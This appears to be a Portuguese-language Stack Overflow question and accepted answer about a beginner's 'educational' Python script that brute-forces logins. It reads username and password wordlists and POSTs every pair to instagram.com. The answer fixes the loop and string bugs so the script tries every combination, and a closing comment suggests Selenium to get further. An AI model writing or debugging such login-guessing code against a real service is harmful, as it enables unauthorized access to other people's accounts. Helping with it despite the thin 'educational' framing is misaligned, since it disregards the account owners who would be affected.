# O python só lê a última palavra da minha wordlist

Tags: python

Estou começando no python e peguei um script educativo de bruteforce. Porém, quando o script lê as senhas e usuários da wordlist, ele pega apenas o último registro e ignora todos os outros. Como fazer ele ler todas as linhas?

```
import requests

url='https://www.instagram.com'

file_pass = open('file_pass.txt')
file_user = open('file_user.txt')

try:
    for users in file_user.readlines():
        for passw in file_pass.readlines():
            payload = {'username': users, 'password': passw}
            requisicao = requests.post(url, data=payload)
        if 'Sua senha está incorreta. Confira-a.' in requisicao.text:
            print('User: {}  Pass: {} > Inválido'.format(users, passw))
        else:
            print('User: {}  Pass: {} > Válido'.format(users, passw))
except KeyboardInterrupt:
    print("Varredura encerrada!")
```

Comment: Uma dica: `readlines` carrega todo o arquivo pra memória (o que pode ser um problema em arquivos grandes). Para ler linha a linha, basta fazer `for users in file_user` e `for passw in file_pass`. Considere também [usar `with`](https://pt.stackoverflow.com/q/49238/112052) para abrir os arquivos, pios assim você garante que eles são fechados ao final, mesmo em caso de erro.

Comment: @hkotsubo - Fiz a remoção do readlines(), porém agora me apresenta o erro:
Traceback (most recent call last):
  File "c:/Users/Usuário/Desktop/DEV - APPS/bruteforce/bruteforce.py", line 10, in <module>
    for passw in file_pass():
TypeError: '_io.TextIOWrapper' object is not callable

Comment: É só `file_pass`, sem parênteses

Comment: He he "script educativo de bruteforce"...

Comment: eu acho que você devia seguir o que o hkotsubo falou, mas olhando seu código ele parece que a identação do if e else devia ta dentro do segundo for.

Comment: @EduardoCaetanoCorrêa realmente a identação estava incorreta, consertei!

Answer (score 0, accepted):

Você está cometendo três erros no seu código:

**1)** Você precisa voltar o cursor do arquivo de senhas para o começo:

```
file_pass.seek(0)
```

**2)** Para cada linha lida, o caracter de quebra de linha precisa ser removido do final da string;

```
 payload = {'username': users.strip(), 'password': passw.strip()}
```

**3)** Seu bloco `if` não está indentado corretamente.

Veja a solução comentada:

```
import requests

url='https://www.instagram.com'

# Abre arquivos
file_pass = open('file_pass.txt')
file_user = open('file_user.txt')

try:
    # Para cada usuario....
    for users in file_user.readlines():

        # Retorna cursor para o inicio do arquivo de senhas
        file_pass.seek(0)

        # Para cada senha...
        for passw in file_pass.readlines():

            # Monta payload removendo quebra de linha
            payload = {'username': users.strip(), 'password': passw.strip()}

            # Requisicao HTTP
            requisicao = requests.post(url, data=payload)

            # Verifica conteudo da resposta
            if 'Sua senha está incorreta. Confira-a.' in requisicao.text:
                print('{} --> Inválido'.format(payload))
            else:
                print('{} --> Válido'.format(payload))

except KeyboardInterrupt:
    print("Varredura encerrada!")

# Fecha arquivos
file_pass.close()
file_user.close()
```

Comment: Show de bola! Agora ele lê todas as linhas das senhas
Só que agora, também, ele informa válido para todas as tentativas e sempre volta para o início kkkkkk

Comment: Como você mesmo comentou na sua pergunta, trata-se apenas de um "script educativo".

Comment: exatamente, estou aprendendo o que se pode fazer com phyton.
e não consegui uma viabilidade do que codei  \(._.)/

Comment: De qualquer modo, fica meu agradecimento.

Comment: Experimentacão + persistência = Viabilidade

Comment: Com toda certeza, muito obrigado pelo norte!

Comment: Talvez com [isso](https://selenium-python.readthedocs.io/) você consiga chegar mais longe.